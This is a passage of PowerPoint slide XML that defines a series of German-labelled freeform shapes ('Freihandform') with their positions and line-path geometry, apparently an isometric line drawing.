                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973E1A9F-617F-4EC5-A4D6-3099836919EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7260117" y="2507156"/>
              <a:ext cx="472997" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191968 w 191966"/>
                <a:gd name="connsiteY0" fmla="*/ 52573 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 191966"/>
                <a:gd name="connsiteY1" fmla="*/ -2896 h 110937"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 191966"/>
                <a:gd name="connsiteY2" fmla="*/ 52573 h 110937"/>
                <a:gd name="connsiteX3" fmla="*/ 95975 w 191966"/>
                <a:gd name="connsiteY3" fmla="*/ 108042 h 110937"/>
                <a:gd name="connsiteX4" fmla="*/ 191968 w 191966"/>
                <a:gd name="connsiteY4" fmla="*/ 52573 h 110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66" h="110937">
                  <a:moveTo>
                    <a:pt x="191968" y="52573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="-2896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95975" y="108042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191968" y="52573"/>
                  </a:lnTo>
                  <a:close/>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14" name="Freihandform: Form 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98D2E7AB-11ED-4822-812C-2E5E7D74447C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7023594" y="2916939"/>
              <a:ext cx="236474" cy="136666"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95973"/>
                <a:gd name="connsiteY0" fmla="*/ -2867 h 55466"/>
                <a:gd name="connsiteX1" fmla="*/ 95975 w 95973"/>
                <a:gd name="connsiteY1" fmla="*/ 52600 h 55466"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95973" h="55466">
                  <a:moveTo>
                    <a:pt x="1" y="-2867"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95975" y="5260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17" name="Freihandform: Form 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642A7EF8-0DB6-4630-A0BE-7A5CFC96B8A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5841050" y="1824036"/>
              <a:ext cx="236311" cy="273102"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95907"/>
                <a:gd name="connsiteY0" fmla="*/ 107886 h 110839"/>
                <a:gd name="connsiteX1" fmla="*/ 95908 w 95907"/>
                <a:gd name="connsiteY1" fmla="*/ 52515 h 110839"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 95907"/>
                <a:gd name="connsiteY2" fmla="*/ -2954 h 110839"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 95907"/>
                <a:gd name="connsiteY3" fmla="*/ 107886 h 110839"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95907" h="110839">
                  <a:moveTo>
                    <a:pt x="1" y="107886"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95908" y="52515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="107886"/>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22" name="Freihandform: Form 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{913D2413-CD06-4126-83A7-C2D5AE4FB6E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10098274" y="2098316"/>
              <a:ext cx="1182543" cy="819554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 383963 w 479936"/>
                <a:gd name="connsiteY0" fmla="*/ -2907 h 332617"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 479936"/>
                <a:gd name="connsiteY1" fmla="*/ 218775 h 332617"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 479936"/>
                <a:gd name="connsiteY2" fmla="*/ 329711 h 332617"/>
                <a:gd name="connsiteX3" fmla="*/ 479937 w 479936"/>
                <a:gd name="connsiteY3" fmla="*/ 52464 h 332617"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="479936" h="332617">
                  <a:moveTo>
                    <a:pt x="383963" y="-2907"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="218775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="329711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479937" y="5246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23" name="Freihandform: Form 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396501AF-1499-4BD9-8169-1CA234B7B7A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10334797" y="1688304"/>
              <a:ext cx="23469" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 218824 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -2954 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="221777">
                  <a:moveTo>
                    <a:pt x="1" y="218824"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-295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24" name="Freihandform: Form 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33655994-C5EF-413C-8A0F-FBFAF7A63690}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10098274" y="1961643"/>
              <a:ext cx="236520" cy="136671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 95992"/>
                <a:gd name="connsiteY0" fmla="*/ -2948 h 55468"/>
                <a:gd name="connsiteX1" fmla="*/ 95994 w 95992"/>
                <a:gd name="connsiteY1" fmla="*/ 52521 h 55468"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95992" h="55468">
                  <a:moveTo>
                    <a:pt x="1" y="-2948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95994" y="52521"/>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26" name="Freihandform: Form 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9320C2E8-A34B-4CDA-82E4-2FA382A6AF07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10334797" y="2508094"/>
              <a:ext cx="69" cy="273344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 29 w 28"/>
                <a:gd name="connsiteY0" fmla="*/ -2896 h 110937"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 28"/>
                <a:gd name="connsiteY1" fmla="*/ 108042 h 110937"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="28" h="110937">
                  <a:moveTo>
                    <a:pt x="29" y="-2896"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="108042"/>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27" name="Freihandform: Form 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265E518E-5A42-437E-91D0-3E0FC6515288}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10571320" y="2644768"/>
              <a:ext cx="23469" cy="273102"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ 107956 h 110839"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ -2884 h 110839"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="110839">
                  <a:moveTo>
                    <a:pt x="1" y="107956"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-288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33" name="Freihandform: Form 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF12927B-4F20-4425-8BCB-7719EC693CF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7969545" y="1415195"/>
              <a:ext cx="946161" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 384000"/>
                <a:gd name="connsiteY0" fmla="*/ 218801 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 384001 w 384000"/>
                <a:gd name="connsiteY1" fmla="*/ -2977 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="384000" h="221777">
                  <a:moveTo>
                    <a:pt x="1" y="218801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384001" y="-2977"/>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34" name="Freihandform: Form 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9187EA-81A0-44BA-BBB0-0BAC5B633C30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7969686" y="1688538"/>
              <a:ext cx="946020" cy="546215"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 383944 w 383943"/>
                <a:gd name="connsiteY0" fmla="*/ -2954 h 221682"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 383943"/>
                <a:gd name="connsiteY1" fmla="*/ 218729 h 221682"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="383943" h="221682">
                  <a:moveTo>
                    <a:pt x="383944" y="-2954"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="218729"/>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35" name="Freihandform: Form 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EA911A7-057E-4BE2-BEAC-3F05BDFE694D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7969545" y="1141853"/>
              <a:ext cx="473140" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 192025 w 192024"/>
                <a:gd name="connsiteY0" fmla="*/ 107923 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 192024"/>
                <a:gd name="connsiteY1" fmla="*/ -3012 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192024" h="110935">
                  <a:moveTo>
                    <a:pt x="192025" y="107923"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3012"/>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36" name="Freihandform: Form 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6E7A4D1-1241-4D4F-8529-FDA82ADE3A3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7968348" y="868509"/>
              <a:ext cx="474335" cy="274285"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 192509"/>
                <a:gd name="connsiteY0" fmla="*/ -3035 h 111319"/>
                <a:gd name="connsiteX1" fmla="*/ 192511 w 192509"/>
                <a:gd name="connsiteY1" fmla="*/ 108284 h 111319"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="192509" h="111319">
                  <a:moveTo>
                    <a:pt x="1" y="-3035"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="192511" y="10828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37" name="Freihandform: Form 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC934398-EC90-4507-945A-C526B8527467}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="9861726" y="2644768"/>
              <a:ext cx="236545" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 96002"/>
                <a:gd name="connsiteY0" fmla="*/ 52583 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 96004 w 96002"/>
                <a:gd name="connsiteY1" fmla="*/ -2884 h 110935"/>
                <a:gd name="connsiteX2" fmla="*/ 95994 w 96002"/>
                <a:gd name="connsiteY2" fmla="*/ 108052 h 110935"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 96002"/>
                <a:gd name="connsiteY3" fmla="*/ 52583 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="96002" h="110935">
                  <a:moveTo>
                    <a:pt x="1" y="52583"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96004" y="-2884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95994" y="108052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="52583"/>
                  </a:lnTo>
                  <a:close/>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38" name="Freihandform: Form 137">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF33C10-98DE-43A5-8711-F649E0E0CF0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915706" y="1825212"/>
              <a:ext cx="709544" cy="1229332"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 95984 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ 496014 h 498926"/>
                <a:gd name="connsiteX1" fmla="*/ 96032 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ 163300 h 498926"/>
                <a:gd name="connsiteX2" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY2" fmla="*/ 52556 h 498926"/>
                <a:gd name="connsiteX3" fmla="*/ 191987 w 287969"/>
                <a:gd name="connsiteY3" fmla="*/ -2913 h 498926"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY4" fmla="*/ 107927 h 498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69" h="498926">
                  <a:moveTo>
                    <a:pt x="95984" y="496014"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96032" y="163300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287970" y="52556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191987" y="-2913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="107927"/>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39" name="Freihandform: Form 138">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F33EE69-ED94-4C67-82CB-E2B4548F9FC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8915706" y="1688538"/>
              <a:ext cx="23469" cy="819083"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY0" fmla="*/ -2942 h 332426"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9525"/>
                <a:gd name="connsiteY1" fmla="*/ 329485 h 332426"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9525" h="332426">
                  <a:moveTo>
                    <a:pt x="1" y="-2942"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="329485"/>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41" name="Freihandform: Form 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15243F93-BFB2-4D11-AFA8-E15C4228C9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280839" y="1141853"/>
              <a:ext cx="472974" cy="273339"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 191958 w 191957"/>
                <a:gd name="connsiteY0" fmla="*/ 107923 h 110935"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 191957"/>
                <a:gd name="connsiteY1" fmla="*/ -3012 h 110935"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="191957" h="110935">
                  <a:moveTo>
                    <a:pt x="191958" y="107923"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-3012"/>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42" name="Freihandform: Form 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A4D5AF3-6F76-47EB-B481-74058B4133B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280817" y="1961643"/>
              <a:ext cx="709566" cy="410012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287980 w 287978"/>
                <a:gd name="connsiteY0" fmla="*/ -2936 h 166404"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 287978"/>
                <a:gd name="connsiteY1" fmla="*/ 163468 h 166404"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287978" h="166404">
                  <a:moveTo>
                    <a:pt x="287980" y="-2936"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="16346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43" name="Freihandform: Form 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F71B492B-9E0F-46DB-ACC6-4828630CE9A9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11280817" y="1415195"/>
              <a:ext cx="22" cy="546449"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 11 w 9"/>
                <a:gd name="connsiteY0" fmla="*/ 218801 h 221777"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 9"/>
                <a:gd name="connsiteY1" fmla="*/ -2977 h 221777"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9" h="221777">
                  <a:moveTo>
                    <a:pt x="11" y="218801"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="-2977"/>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44" name="Freihandform: Form 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7340B39F-1280-4F9E-A101-14C3D6E13078}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11517340" y="1824743"/>
              <a:ext cx="709544" cy="410012"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 287970 w 287969"/>
                <a:gd name="connsiteY0" fmla="*/ -2948 h 166404"/>
                <a:gd name="connsiteX1" fmla="*/ 1 w 287969"/>
                <a:gd name="connsiteY1" fmla="*/ 163456 h 166404"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="287969" h="166404">
                  <a:moveTo>
                    <a:pt x="287970" y="-2948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="163456"/>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45" name="Freihandform: Form 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205536AC-DEBD-4F6E-8FD8-53DCD8488A44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
